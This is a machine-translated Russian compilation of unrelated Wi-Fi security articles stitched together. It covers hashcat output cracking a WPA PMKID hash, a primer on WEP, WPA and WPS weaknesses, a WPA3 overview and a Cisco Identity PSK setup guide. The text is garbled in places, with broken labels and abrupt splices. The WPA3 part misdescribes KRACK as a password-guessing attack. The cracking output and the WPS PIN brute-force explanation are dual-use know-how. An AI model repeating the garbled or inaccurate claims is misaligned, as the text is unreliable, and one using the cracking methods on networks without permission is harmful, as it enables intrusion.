растровые изображения: 16 бит, 65536 записей, 0x0000ffff маска, 262144 байт, 5/13 вращается

Применимые оптимизаторы:
* нул-байт
* Одиночн-хэш
* Одиночн-соль
* грубая сила
* Медленн-хэш-SIMD-петля

Минимальная длина пароля, поддерживаемая ядром: 8
максимальная длина пароля, поддерживаемая ядром: 63

Сторожевой таймер: триггер прерывания температуры установлен на 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a: hashcat!

Сессия.………:
статус hashcat...........: Трещины
Хэш.Тип.…….: Хэш WPA-PMKID-
PBKDF2.Мишень......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...A39f3a
время.Начатый.….: Чт 26 июля 12: 51: 38 2018 (41 сек)
время.Оценка...: Чт июл 26 12:52: 19 2018 (0 сек)
угадайте.Маска.……: ?л?л?л?л?л?ЛТ! [8]
Угадай.Очередь......: 1/1 (100.00%)
скорость.Разработка.#1…..: 408.9 kH / s (103.86 ms) @ Accel:64 петли:128 Thr:1024 Vec:1
Скорость.Разработка.#2…..: 408.6 kH / s (104.90 ms) @ Accel:64 петли:128 Thr:1024 Vec:1
Скорость.Разработка.#3…..: 412.9 kH / s (102.50 ms) @ Accel:64 петли:128 Thr:1024 Vec: 1
Скорость.Разработка.#4…..: 410.9 kH / s (104.66 ms) @ Accel:64 петли:128 Thr:1024 Vec:1
Скорость.Разработка.#*…..: 1641.3 Kh / s
восстановлено........: 1/1 (100.00%) Переваривает, 1/1 (100.00%) Солей
Прогресс.........: 66846720/308915776 (21.64%)
отклонено.........: 0/66846720 (0.00%)
восстановить.Точка.…: 0/11881376 (0.00%)
кандидатов.#1…. хариерт! - >hhzkzet!
Кандидаты.#2….: hdtivst! - > hzxkbnt!
Кандидаты.#3….: gnxpwet! - >gwqivst!
Кандидаты.#4….: gxhcddt! - >grjmrut!
HWMon.Разработка.#1…..: Temp: 81c вентилятор: 54% Util:75% Core:1771MHz Mem:4513mhz Шина: 1
HWMon.Разработка.#2…..: Temp: 81c вентилятор: 54% Util: 100% Core: 1607MHz Mem:4513mhz Шина:1
HWMon.Разработка.#3…..: Temp: 81c вентилятор: 54% Util:94% Core:1683MHz Mem:4513mhz Шина: 1
HWMon.Разработка.#4…..: Temp: 81c вентилятор: 54% Util: 93% Core: 1620MHz Mem:4513mhz Bus:1

Начало: Чт 26 Июля 12: 51: 30 2018
Остановлено: Чт 26 Июля 12: 52: 21 2018
Когда мы смотрим на ранее доступные атаки взлома WiFi для хакеров WiFi, нам нужно сидеть сложа руки и ждать, пока целевой пользователь не войдет в систему позже, мы можем взломать ключ, захватив четырехстороннее рукопожатие.

Чтобы получить доступ к PMKID, эта новая атака должна попытаться аутентифицироваться в беспроводной сети позже, мы можем легко взломать пароль WiFi и решающее предварительное совместное имя хакера WiFi.

Кроме того, этот метод намного проще получить доступ к хэшу, который содержит предварительный общий ключ, а затем хэш будет взломан; также эта атака немного сложна в зависимости от сложности пароля.

Новое обновление :
Недавно WiFi Alliance выпустила высокозащищенный протокол WPA3 для сети WiFi, но WPA3 снова взломан командой исследователей безопасности из-за недостатка безопасности в протоколе. Используя вышеуказанный метод теперь вы можете взломать пароль WiFi, также процесс занимает так много времени, чтобы

Эта статья полностью для целей образования, пожалуйста, не пытайтесь проверить любую сеть WiFi без разрешения.

проникновение и защита. 1) Матчасть / Habr

Синоптики предсказывают, что к 2016 году наступит второй ледниковый период трафик в беспроводных сетях на 10% превзойдёт трафик в проводном Ethernet. При этом от года в год частных точек доступа становится примерно на 20% больше.

При таком тренде не может не радовать то, что 80% владельцев сетей не меняют пароли доступа по умолчанию. В их число входят и сети компаний.

Этим циклом статей я хочу собрать воедино описания существующих технологии защит, их проблемы и способы обхода, таким образом, что в конце читатель сам сможет сказать, как сделать свою сеть непробиваемой, и даже наглядно продемонстрировать проблемы на примере незадачливого соседа (do not try this at home, kids). Практическая сторона взлома будет освещена с помощью Kali Linux (бывший Backtrack 5) в следующих частях.

Статья по мере написания выросла с 5 страниц до 40, поэтому я решил разбить её на части. Этот цикл — не просто инструкция, как нужно и не нужно делать, а подробное объяснение причин для этого. Ну, а кто хочет инструкций — они такие:

Используйте WPA2-PSK-CCMP с паролем от 12 символов a-z (2000+ лет перебора на ATI-кластере). Измените имя сети по умолчанию на нечто уникальное (защита от rainbow-таблиц). Отключите WPS (достаточно перебрать 10000 комбинаций PIN). Не полагайтесь на MAC-фильтрацию и скрытие SSID.

Оглавление:
1) Матчасть
2) Kali. Скрытие SSID. MAC-фильтрация. WPS
3) WPA. OpenCL/CUDA. Статистика подбора

Но сначала — матчасть.
Передайте мне сахар

Представьте, что вы — устройство, которое принимает инструкции. К вам может подключиться каждый желающий и отдать любую команду. Всё хорошо, но на каком-то этапе потребовалось фильтровать личностей, которые могут вами управлять. Вот здесь и начинается самое интересное.

Как понять, кто может отдать команду, а кто нет? Первое, что приходит в голову — по паролю. Пусть каждый клиент перед тем, как передать новую команду, передаст некий пароль. Таким образом, вы будете выполнять только команды, которые сопровождались корректным паролем. Остальные — фтопку.


Именно так работает базовая авторизация HTTP (Auth Basic):
AuthType Basic
AuthName "My super secret zone!"
AuthUserFile /home/.htpasswd
Require valid-user 

После успешной авторизации браузер просто-напросто будет передавать определённый заголовок при каждом запросе в закрытую зону:

Authorization: Basic YWRtaW46cGFzcw==

То есть исходное:
echo -n 'admin:pass' | base64
# YWRtaW46cGFzcw==

У данного подхода есть один большой недостаток — так как пароль (или логин-пароль, что по сути просто две части того же пароля) передаётся по каналу «как есть» — кто угодно может встрять между вами и клиентом и получить ваш пароль на блюдечке. А затем использовать его и распоряжаться вами, как угодно!

Для предотвращения подобного безобразия можно прибегнуть к хитрости: использовать какой-либо двухсторонний алгоритм шифрования, где закрытым ключом будет как раз наш пароль, и явно его никогда не передавать. Однако проблемы это не решит — достаточно один раз узнать пароль и можно будет расшифровать любые данные, переданные в прошлом и будущем, плюс шифровать собственные и успешно маскироваться под клиента. А учитывая то, что пароль предназначен для человека, а люди склонны использовать далеко не весь набор из 256 байт в каждом символе, да и символов этих обычно около 6-8… в общем, комсомол не одобрит.

Что делать? А поступим так, как поступают настоящие конспираторы: при первом контакте придумаем длинную случайную строку (достаточно длинную, чтобы её нельзя было подобрать, пока светит это солнце), запомним её и все дальнейшие передаваемые данные будем шифровать с использованием этого «псевдонима» для настоящего пароля. А ещё периодически менять эту строку — тогда джедаи вообще не пройдут.


Первые две передачи (зелёные иконки на рисунке выше) — это фаза с «пожатием рук» (handshake), когда сначала мы говорим серверу о нашей легитимности, показывая правильный пароль, на что сервер нам отвечает случайной строкой, которую мы затем используем для шифрования и передачи любых данных.

Итак, для подбора ключа хакеру нужно будет либо найти уязвимость в алгоритме его генерации (как в случае с Dual_EC_DRBG), либо арендовать сотню-другую параллельных вселенных и несколько тысяч ATI-ферм для решения этой задачи при своей жизни. Всё это благодаря тому, что случайный ключ может быть любой длины и содержать любые коды из доступных 256, потому что пользователю-человеку никогда не придётся с ним работать.

Именно такая схема с временным ключом (сеансовый ключ, session key или ticket) в разных вариациях и используется сегодня во многих системах — в том числе SSL/TLS и стандартах защиты беспроводных сетей, о которых будет идти речь.

План атаки

Внимательные читатели, конечно, заметили, что как бы мы не хитрили — от передачи пароля и временного ключа в открытой или хэшированной форме нам никуда не деться. Как результат — достаточно хакеру перехватить передачу на этой фазе, и он сможет читать все последующие данные, а также участвовать в процессе, вставляя свои пять копеек. И отличить его невозможно, так как вся информация, которой бы мог руководствоваться сервер для выдачи временного ключа или проверки доступа базируется именно на том, что было в начале передачи — handshake. Поэтому хакер знает всё то же, что и сервер, и клиент, и может водить обоих за нос, пока не истечёт срок действия временного ключа.

Наша задача при взломе любой передачи так или иначе сводится к перехвату рукопожатия, из которого можно будет либо вытащить временный ключ, либо исходный пароль, либо и то, и другое. В целом, это довольно долгое занятие и требует определённой удачи.

Но это в идеальном мире…

Механизмы защиты Wi-Fi

Технологии создаются людьми и почти во всех из них есть ошибки, иногда достаточно критические, чтобы обойти любую самую хорошую в теории защиту. Ниже мы пробежимся по списку существующих механизмов защиты передачи данных по радиоканалу (то есть не затрагивая SSL, VPN и другие более высокоуровневые способы).
OPEN

OPEN — это отсутствие всякой защиты. Точка доступа и клиент никак не маскируют передачу данных. Почти любой беспроводной адаптер в любом ноутбуке с Linux может быть установлен в режим прослушки, когда вместо отбрасывания пакетов, предназначенных не ему, он будет их фиксировать и передавать в ОС, где их можно спокойно просматривать. Кто у нас там полез в Твиттер?

Именно по такому принципу работают проводные сети — в них нет встроенной защиты и «врезавшись» в неё или просто подключившись к хабу/свичу сетевой адаптер будет получать пакеты всех находящихся в этом сегменте сети устройств в открытом виде. Однако с беспроводной сетью «врезаться» можно из любого места — 10-20-50 метров и больше, причём расстояние зависит не только от мощности вашего передатчика, но и от длины антенны хакера. Поэтому открытая передача данных по беспроводной сети гораздо более опасна.

В этом цикле статей такой тип сети не рассматривается, так как взламывать тут нечего. Если вам нужно пользоваться открытой сетью в кафе или аэропорту — используйте VPN (избегая PPTP) и SSL (https://, но при этом поставьте HTTPS Everywhere, или параноидально следите, чтобы из адресной строки «внезапно» не исчез замок, если кто включит sslstrip — что, впрочем, переданных паролей уже не спасёт), и даже всё вместе. Тогда ваших котиков никто не увидит.

WEP

WEP — первый стандарт защиты Wi-Fi. Расшифровывается как Wired Equivalent Privacy («эквивалент защиты проводных сетей»), но на деле он даёт намного меньше защиты, чем эти самые проводные сети, так как имеет множество огрехов и взламывается множеством разных способов, что из-за расстояния, покрываемого передатчиком, делает данные более уязвимыми. Его нужно избегать почти так же, как и открытых сетей — безопасность он обеспечивает только на короткое время, спустя которое любую передачу можно полностью раскрыть вне зависимости от сложности пароля. Ситуация усугубляется тем, что пароли в WEP — это либо 40, либо 104 бита, что есть крайне короткая комбинация и подобрать её можно за секунды (это без учёта ошибок в самом шифровании).

WEP был придуман в конце 90-х, что его оправдывает, а вот тех, кто им до сих пор пользуется — нет. Я до сих пор на 10-20 WPA-сетей стабильно нахожу хотя бы одну WEP-сеть.

На практике существовало несколько алгоритмов шифровки передаваемых данных — Neesus, MD5, Apple — но все они так или иначе небезопасны. Особенно примечателен первый, эффективная длина которого — 21 бит (~5 символов).

Основная проблема WEP — в фундаментальной ошибке проектирования. Как было проиллюстрировано в начале — шифрование потока делается с помощью временного ключа. WEP фактически передаёт несколько байт этого самого ключа вместе с каждым пакетом данных. Таким образом, вне зависимости от сложности ключа раскрыть любую передачу можно просто имея достаточное число перехваченных пакетов (несколько десятков тысяч, что довольно мало для активно использующейся сети).

К слову, в 2004 IEEE объявили WEP устаревшим из-за того, что стандарт «не выполнил поставленные перед собой цели [обеспечения безопасности беспроводных сетей]».

Про атаки на WEP будет сказано в третьей части. Скорее всего в этом цикле про WEP не будет, так как статьи и так получились очень большие, а распространённость WEP стабильно снижается. Кому надо — легко может найти руководства на других ресурсах.

WPA и WPA2

WPA — второе поколение, пришедшее на смену WEP. Расшифровывается как Wi-Fi Protected Access. Качественно иной уровень защиты благодаря принятию во внимание ошибок WEP. Длина пароля — произвольная, от 8 до 63 байт, что сильно затрудняет его подбор (сравните с 3, 6 и 15 байтами в WEP).

Стандарт поддерживает различные алгоритмы шифрования передаваемых данных после рукопожатия: TKIP и CCMP. Первый — нечто вроде мостика между WEP и WPA, который был придуман на то время, пока IEEE были заняты созданием полноценного алгоритма CCMP. TKIP так же, как и WEP, страдает от некоторых типов атак, и в целом не безопасен. Сейчас используется редко (хотя почему вообще ещё применяется — мне не понятно) и в целом использование WPA с TKIP почти то же, что и использование простого WEP.

Одна из занятных особенностей TKIP — в возможности так называемой Michael-атаки. Для быстрого залатывания некоторых особо критичных дыр в WEP в TKIP было введено правило, что точка доступа обязана блокировать все коммуникации через себя (то есть «засыпать») на 60 секунд, если обнаруживается атака на подбор ключа (описана во второй части). Michael-атака — простая передача «испорченных» пакетов для полного отключения всей сети. Причём в отличии от обычного DDoS тут достаточно всего двух (двух) пакетов для гарантированного выведения сети из строя на одну минуту.


WPA отличается от WEP и тем, что шифрует данные каждого клиента по отдельности. После рукопожатия генерируется временный ключ — PTK — который используется для кодирования передачи этого клиента, но никакого другого. Поэтому даже если вы проникли в сеть, то прочитать пакеты других клиентов вы сможете только, когда перехватите их рукопожатия — каждого по отдельности. Демонстрация этого с помощью Wireshark будет в третьей части.

Кроме разных алгоритмов шифрования, WPA(2) поддерживают два разных режима начальной аутентификации (проверки пароля для доступа клиента к сети) — PSK и Enterprise. PSK (иногда его называют WPA Personal) — вход по единому паролю, который вводит клиент при подключении. Это просто и удобно, но в случае больших компаний может быть проблемой — допустим, у вас ушёл сотрудник и чтобы он не мог больше получить доступ к сети приходится применять способ из «Людей в чёрном» менять пароль для всей сети и уведомлять об этом других сотрудников. Enterprise снимает эту проблему благодаря наличию множества ключей, хранящихся на отдельном сервере — RADIUS. Кроме того, Enterprise стандартизирует сам процесс аутентификации в протоколе EAP (Extensible Authentication Protocol), что позволяет написать собственный велосипед алгоритм. Короче, одни плюшки для больших дядей.

В этом цикле будет подробно разобрана атака на WPA(2)-PSK, так как Enterprise — это совсем другая история, так как используется только в больших компаниях.

WPS/QSS

WPS, он же Qikk aSS QSS — интересная технология, которая позволяет нам вообще не думать о пароле, а просто добавить воды нажать на кнопку и тут же подключиться к сети. По сути это «легальный» метод обхода защиты по паролю вообще, но удивительно то, что он получил широкое распространение при очень серьёзном просчёте в самой системе допуска — это спустя годы после печального опыта с WEP.

WPS позволяет клиенту подключиться к точке доступа по 8-символьному коду, состоящему из цифр (PIN). Однако из-за ошибки в стандарте нужно угадать лишь 4 из них. Таким образом, достаточно всего-навсего 10000 попыток подбора и вне зависимости от сложности пароля для доступа к беспроводной сети вы автоматически получаете этот доступ, а с ним в придачу — и этот самый пароль как он есть.

Учитывая, что это взаимодействие происходит до любых проверок безопасности, в секунду можно отправлять по 10-50 запросов на вход через WPS, и через 3-15 часов (иногда больше, иногда меньше) вы получите ключи от рая.

Когда данная уязвимость была раскрыта производители стали внедрять ограничение на число попыток входа (rate limit), после превышения которого точка доступа автоматически на какое-то время отключает WPS — однако до сих пор таких устройств не больше половины от уже выпущенных без этой защиты. Даже больше — временное отключение кардинально ничего не меняет, так как при одной попытке входа в минуту нам понадобится всего 10000/60/24 = 6,94 дней. А PIN обычно отыскивается раньше, чем проходится весь цикл.

Хочу ещё раз обратить ваше внимание, что при включенном WPS ваш пароль будет неминуемо раскрыт вне зависимости от своей сложности. Поэтому если вам вообще нужен WPS — включайте его только когда производится подключение к сети, а в остальное время держите этот бекдор выключенным.

Атака на WPS будет рассмотрена во второй части.

p.s: так как тема очень обширная, в материал могли закрасться ошибки и неточности. Вместо криков «автор ничего не понимает» лучше использовать комментарии и ЛС. Это будет только приветствоваться.

Оглавление:
1) Матчасть
2) Kali. Скрытие SSID. MAC-фильтрация. WPS
3) WPA. OpenCL/CUDA. Статистика подбора

всё, что вам нужно знать про WPA3 / Хабр

WPA3, улучшенное открытие [Enhanced Open], простое соединение [Easy Connect]: три новых протокола от Wi-Fi Alliance


Недавно Wi-Fi Alliance обнародовал крупнейшее обновление безопасности Wi-Fi за последние 14 лет. Протокол безопасности Wi-Fi Protected Access 3 (WPA3) вводит очень нужные обновления в протокол WPA2, представленный в 2004 году. Вместо того, чтобы полностью переработать безопасность Wi-Fi, WPA3 концентрируется на новых технологиях, которые должны закрыть щели, начавшие появляться в WPA2.

Wi-Fi Alliance также объявил о двух дополнительных, отдельных протоколах сертификации, вводящихся в строй параллельно WPA3. Протоколы Enhanced Open и Easy Connect не зависят от WPA3, но улучшают безопасность для определённых типов сетей и ситуаций.

Все протоколы доступны для внедрения производителями в их устройства. Если WPA2 можно считать показателем, то эти протоколы в конечном итоге будут приняты повсеместно, но Wi-Fi Alliance не даёт никакого графика, по которому это должно будет происходить. Скорее всего, с внедрением новых устройств на рынок мы в итоге достигнем этапа, после которого WPA3, Enhanced Open и Easy Connect станут новыми опорами безопасности.

Что же делают все эти новые протоколы? Деталей много, и поскольку большинство из них связано с беспроводным шифрованием, встречается и сложная математика – но вот примерное описание четырёх основных изменений, которые они принесут с собой в дело беспроводной безопасности.

Одновременная аутентификация равных [Simultaneous Authentication of Equals, SAE]


Самое крупное изменение, которое принесёт WPA3. Самый главный момент в защите сети наступает, когда новое устройство пытается установить соединение. Враг должен оставаться за воротами, поэтому WPA2 и WPA3 уделяют много внимания аутентификации новых соединений и гарантии того, что они не будут являться попытками хакера получить доступ.

SAE – новый метод аутентификации устройства, пытающегося подключиться к сети. SAE – это вариант т.н. dragonfly handshake [установления связи по методу стрекозы], использующего криптографию для предотвращения угадывания пароля злоумышленником. Он говорит о том, как именно новое устройство, или пользователь, должен «приветствовать» сетевой маршрутизатор при обмене криптографическими ключами.

SAE идёт на замену методу Pre-Shared Key (PSK) [предварительно розданного ключа], используемого с момента презентации WPA2 в 2004-м. PSK также известен, как четырёхэтапное установление связи, поскольку столько именно сообщений, или двусторонних «рукопожатий», необходимо передать между маршрутизатором и подсоединяющимся устройством, чтобы подтвердить, что они договорились по поводу пароля, при том, что ни одна из сторон не сообщает его другой. До 2016 года PSK казался безопасным, а потом была открыта атака с переустановкой ключа (Key Reinstallation Attacks, KRACK).

KRACK прерывает серию рукопожатий, притворяясь, что соединение с маршрутизатором временно прервалось. На самом деле он использует повторяющиеся возможности соединения для анализа рукопожатий, пока не сможет догадаться о том, какой был пароль. SAE блокирует возможность такой атаки, а также наиболее распространённые офлайновые атаки по словарю, когда компьютер перебирает миллионы паролей, чтобы определить, какой из них подходит к информации, полученной во время PSK-соединений.

Как следует из названия, SAE работает на основании предположения о равноправности устройств, вместо того, чтобы считать одно устройство отправляющим запросы, а второе – устанавливающим право на подключение (традиционно это были устройство, пытающееся соединиться, и маршрутизатор, соответственно). Любая из сторон может отправить запрос на соединение, и потом они начинают независимо отправлять удостоверяющую их информацию, вместо того, чтобы обмениваться сообщениями по очереди, туда-сюда. А без такого обмена у атаки KRACK не будет возможности «вставить ногу между дверью и косяком», и атаки по словарю станут бесполезными.

SAE предлагает дополнительное усиление безопасности, которого не было в PSK: прямую секретность [forward secrecy]. Допустим, атакующий получает доступ к зашифрованным данным, которые маршрутизатор отправляет и получает из интернета. Раньше атакующий мог сохранить эти данные, а потом, в случае успешного подбора пароля, расшифровать их. С использованием SAE при каждом новом соединении устанавливается новый шифрующий пароль, поэтому даже если атакующий в какой-то момент и проникнет в сеть, он сможет украсть только пароль от данных, переданных после этого момента.

SAE описан в стандарте IEEE 802.11-2016, занимающем более 3500 страниц.

192-битные протоколы безопасности


WPA3-Enterprise, версия WPA3, предназначенная для работы в правительственных и финансовых учреждениях, а также в корпоративной среде, обладает шифрованием в 192 бита. Такой уровень шифрования для домашнего маршрутизатора будет избыточным, но его имеет смысл использовать в сетях, работающих с особо чувствительной информацией.

Сейчас Wi-Fi работает с безопасностью в 128 бит. Безопасность в 192 бита не будет обязательной к использованию – это будет вариант настроек для тех организаций, сетям которых она будет нужна. Wi-Fi Alliance также подчёркивает, что в промышленных сетях необходимо усиливать безопасность по всем фронтам: стойкость системы определяется стойкостью самого слабого звена.

Чтобы гарантировать подобающий уровень безопасности всей сети, от начала до конца, WPA3-Enterprise будет использовать 256-битный протокол Galois/Counter Mode для шифрования, 384-битный Hashed Message Authentication Mode режим для создания и подтверждения ключей, и алгоритмы Elliptic Curve Diffie-Hellman exchange, Elliptic Curve Digital Signature Algorithm для аутентификации ключей. В них много сложной математики, но плюс в том, что на каждом шагу будет поддерживаться шифрование в 192 бита.

Easy Connect


Easy Connect – это признание наличия в мире огромного количества устройств, присоединённых к сети. И хотя, возможно, не все люди захотят обзавестись умными домами, у среднего человека к домашнему маршрутизатору сегодня, скорее всего, подключено больше устройств, чем в 2004 году. Easy Connect – попытка Wi-Fi альянса сделать подсоединение всех этих устройств более интуитивным.

Вместо того, чтобы каждый раз при добавлении устройства вводить пароль, у устройств будут уникальные QR-коды – и каждый код устройства будет работать как публичный ключ. Для добавления устройства можно будет просканировать код при помощи смартфона, уже соединённого с сетью.

После сканирования устройство обменяется с сетью ключами аутентификации для установления последующей связи. Протокол Easy Connect не связан с WPA3 – устройства, сертифицированные для него, должны иметь сертификат для WPA2, но не обязательно сертификат для WPA3.

Enhanced Open


Enhanced Open – ещё один отдельный протокол, разработанный для защиты пользователя в открытой сети. Открытые сети – такие, которыми вы пользуетесь в кафе или аэропорту – несут в себе целый комплекс проблем, которые обычно не касаются вас, когда вы устанавливаете соединение дома или на работе.

Многие атаки, происходящие в открытой сети, относятся к пассивным. Когда к сети подключается куча людей, атакующий может собрать очень много данных, просто фильтруя проходящую мимо информацию.

Enhanced Open использует оппортунистическое беспроводное шифрование (Opportunistic Wireless Encryption, OWE), определённое в стандарте Internet Engineering Task Force RFC 8110, чтобы защищаться от пассивного подслушивания. Для OWE не требуется дополнительная защита с аутентификацией – оно концентрируется на улучшении шифрования данных, передаваемых по публичным сетям, с целью предотвратить их кражу. Оно также предотвращает т.н. простую инъекцию пакетов [unsophisticated packet injection], в которой атакующий пытается нарушить работу сети, создавая и передавая особые пакеты данных, выглядящие, как часть нормальной работы сети.

Enhanced Open не даёт защиты с аутентификацией из-за особенностей организации открытых сетей – они по определению предназначены для всеобщего использования. Enhanced Open был разработан для улучшения защиты открытых сетей против пассивных атак, так, чтобы не требовать от пользователей ввода дополнительных паролей или прохождения дополнительных шагов.

Пройдёт, по меньшей мере, несколько лет, до того, как WPA3, Easy Connect и Enhanced Open станут нормой. Широкое распространение WPA3 произойдёт только после замены или обновления маршрутизаторов. Однако если вас беспокоит безопасность вашей личной сети, вы сможете заменить свой текущий маршрутизатор на другой, поддерживающий WPA3, как только производители начнут продавать их, что может произойти уже через несколько месяцев.

Cisco Identity PSK — что это такое и как настраивается?

С кодом WLC v8.5 Cisco представила новую функцию под названием Identity PSK, также называемую iPSK. Этот пост призван объяснить цель и преимущества iPSK, а также показать вам, как настроить WLC и ISE для функциональности iPSK.

Что такое Identity PSK?

Обычно в WLAN, настроенной с помощью защиты PSK, все устройства используют один и тот же PSK. Identity PSK — это функция, которая позволяет настраивать несколько PSK (уникальный PSK для каждого клиента, если вы того пожелаете) для одного и того же SSID, при необходимости обеспечивая разные уровни доступа для каждого клиента.Хотя эта технология не нова для отрасли (у некоторых других поставщиков Wi-Fi уже довольно давно были доступны разные ее разновидности), это первый раз, когда мы смогли добиться этого на оборудовании Cisco. Поскольку он интегрируется с сервером RADIUS, вы можете централизовать список своих клиентов / PSK, вместо того, чтобы поддерживать их списки на каждом WLC.

Почему бы просто не использовать 802.1x?

Потому что, возможно, вы не сможете. Во многих средах вы столкнетесь с клиентами, которые не поддерживают 802.1x. Некоторые распространенные примеры включают старые сканеры штрих-кода, медицинские устройства и устройства управления зданием. iPSK позволяет использовать многие из роскошных возможностей 802.1x при использовании клиентов, поддерживающих только PSK.

Какова цель Identity PSK?

Чтобы лучше объяснить это, рассмотрим следующий пример:

Допустим, вы управляете беспроводной сетью в большой больнице. Только недавно медицинские устройства, такие как насосы для внутривенных вливаний и мобильные рентгеновские тележки, начали поддерживать беспроводные сети 802.1x.Даже если вам повезло, что у вас есть некоторые из новых устройств, поддерживающих 802.1x, весьма высоки шансы, что некоторым из устройств, для которых вы вынуждены предоставлять подключение, вероятно, больше десяти лет. Если вам повезет, эти устройства могут подключаться к сети WPA2-PSK и не ограничиваются WEP! Часто производители каждого из этих устройств хотят, чтобы их устройства были единственным типом устройств в этой подсети. В результате вам пришлось создать несколько SSID PSK, чтобы каждый тип устройства (насосы для внутривенных вливаний, рентгеновские тележки и т. Д.)) может иметь свой собственный VLAN. Все мы знаем, какое негативное влияние на производительность оказывает каждый дополнительный идентификатор SSID в среде. Разве не было бы неплохо иметь возможность объединить все эти различные устройства в один SSID PSK и по-прежнему предоставлять к ним дифференцированный доступ? Введите идентификатор PSK.

Другой пример:

Вы управляете беспроводной сетью школьного округа, и ваш округ приобрел недорогие нетбуки, которые поддерживают только PSK. Вы знаете о проблеме безопасности, которая возникает, если кто-то завладевает PSK и делится им с кем-то… и вы знаете, что они это сделают.Identity PSK позволит вам иметь уникальный PSK для каждого из нетбуков, а PSK будет привязан к MAC-адресу самого нетбука. Если была сделана попытка использовать этот PSK на другом устройстве, аутентификация завершилась бы ошибкой.

Как это работает?

Когда клиент аутентифицируется в беспроводной сети, WLC проверяет с сервером RADIUS, существует ли MAC-адрес в политике аутентификации. Если это так, сервер RADIUS ответит ACCESS-ACCEPT, включая PSK как Cisco-AVPair (в ASCII или HEX, в зависимости от того, как он настроен).ACCESS-ACCEPT не обязательно означает, что клиент будет разрешен в сети. На этом этапе WLC еще не проверил PSK клиента для PSK, хранящегося в политике RADIUS. WLC теперь сравнит PSK в ответе RADIUS с тем, который клиент использовал для аутентификации в сети. Если PSK совпадают, клиент будет разрешен в сети (и будут реализованы любые дополнительные атрибуты, отправленные сервером RADIUS, такие как VLAN, QoS или ACL). Важно отметить, что WLC не отправляет PSK, используемый клиентом, на сервер RADIUS.

Какие требования?

Ваш WLC должен будет запускать код как минимум 8.5, и вам нужно будет настроить сервер RADIUS. Практически любой сервер RADIUS будет работать, но некоторые из них легче настроить для iPSK, чем другие. В настоящее время невозможно реализовать iPSK без сервера RADIUS.

Вот серверы RADIUS, которые я лично тестировал с iPSK:
  • Microsoft NPS: Работает с iPSK, но его неудобно использовать, поскольку все MAC-адреса клиентов должны создаваться как пользователи в Active Directory (с MAC-адресом в качестве пользователя и пароля).При неправильной настройке это может быть серьезным риском для безопасности (многие «общие» пользователи / пароли в AD — это нехорошо). Этих пользователей следует поместить в группу без прав доступа к файлам / печати.
  • Cisco ISE: Легче использовать с iPSK, потому что клиентские MAC-адреса могут быть назначены группам идентификаторов конечных точек, и их не нужно создавать в качестве пользователей. К сожалению, ISE стоит денег, и у многих клиентов уже есть серверы Windows в своей среде, которые могут запускать NPS.

Все ли мои клиенты должны быть в моей политике RADIUS?

Нет! Я считаю, что наиболее практичным подходом к iPSK является использование «общего» PSK для большинства ваших клиентов и использование уникальных PSK для клиентов, которым вы хотите назначить различные VLAN, ACL или политики QoS.Чтобы иметь «общий» SSID (не привязанный к конкретным MAC-адресам), ваша политика RADIUS должна иметь правило, которое возвращает ACCESS-ACCEPT, с этим PSK в качестве Cisco-AVPair. Обычно это правило существует непосредственно под правилами для определенных клиентов / PSK.

Конфигурация WLC для идентификации PSK

Если вы знакомы с SSID 802.1x (с RADIUS), настройка WLC довольно проста. Идентификационный PSK SSID — это своего рода гибрид между PSK SSID и 802.1x SSID. Настройте свой SSID так же, как и любой другой SSID PSK, за исключением нескольких дополнительных деталей:

  • Включить фильтрацию MAC-адресов в разделе безопасности L2
  • PSK, который вы настраиваете на WLC, может фактически не использоваться вообще, если вы используете уникальные PSK для своих клиентов. Вы по-прежнему можете использовать общий PSK для большинства клиентов, но его нужно будет настроить в политике RADIUS. Для простоты я обычно также ввожу «общий» PSK в WLC, потому что вы должны что-то настроить в поле PSK.
  • Настройте SSID так, чтобы он указывал на серверы AAA, которые вы настроили для iPSK, так же, как и для типичного SSID 802.1x. Это может быть тот же сервер RADIUS, который вы используете для 802.1x, но ваши политики аутентификации должны быть написаны так, чтобы они не конфликтовали друг с другом.
    • Убедитесь, что CoA включен, если вы используете Cisco ISE в качестве сервера RADIUS.
    • Также убедитесь, что ваш сервер RADIUS настроен как сервер учета AAA в WLC, а также как сервер аутентификации AAA.
  • Включите AAA Override в разделе Advanced (требуется для назначения дополнительных атрибутов подключению, таких как VLAN, QoS или ACL)
  • При использовании Cisco ISE выберите NAC State: ISE в разделе Advanced. Этот параметр не требуется для других серверов RADIUS.

Вот и все! Чтобы любой клиент мог подключиться к этому SSID, ваш сервер RADIUS должен быть настроен для iPSK. Теперь вы должны настроить сервер RADIUS для аутентификации ваших клиентов.

Настройка Cisco ISE в качестве аутентификатора для идентификатора PSK SSID

Для целей этого руководства мы будем предполагать, что ISE уже работает в вашей среде (WLC настроен и протестирован как аутентифицирующее сетевое устройство и т. Д.). Структура меню и снимки экрана в этом руководстве относятся к Cisco ISE v2.2, но с Identity PSK можно использовать любую версию ISE.

Во-первых, давайте поговорим о некоторых общих концепциях:

  • Чтобы позволить вашим устройствам использовать разные PSK с одним и тем же SSID, вы должны спланировать свой подход в отношении того, насколько детальным будет контроль доступа.Имейте в виду, что каждый MAC-адрес, который вы хотите использовать с уникальным PSK, должен иметь специальную ссылку в ISE. Ниже я приведу несколько распространенных сценариев:
    1. Вы хотите сегментировать группы устройств, и каждая группа должна использовать собственный PSK
      • Создание групп идентификаторов конечных точек в ISE, которые содержат группы MAC-адресов для клиентов в каждой группе
      • Ссылайтесь на эти группы в своей политике авторизации и возвращайте PSK для этой группы как Cisco-AVPair в результатах авторизации (подробности о паре AVPair мы рассмотрим ниже).
    2. Вы хотите, чтобы большинство ваших устройств использовали один и тот же PSK, но позволяли нескольким устройствам получать дифференцированный доступ с другим PSK
      • Укажите конкретные устройства в своей политике авторизации (возвращая пары AV с PSK и атрибутами дифференцированного доступа). Это можно делать индивидуально или в группах.
      • Создайте правило «перехвата всех» в политике авторизации, которое позволяет всем другим устройствам использовать «общий» PSK, просто разрешая доступ без какого-либо дифференцированного доступа.
    3. Вы совершенно ненормальный и хотите, чтобы каждое устройство в вашей сети имело уникальный PSK
      • Для этого вам необходимо создать правило авторизации для каждого устройства и вернуть уникальный PSK для этого устройства в виде пары AVPair.

Я собираюсь сосредоточиться на сценарии 2 выше, так как это, кажется, наиболее распространенный сценарий, с которым я сталкиваюсь. Кроме того, он охватывает все необходимые шаги по настройке, необходимые для выполнения любого из описанных выше сценариев.

Шаги настройки:
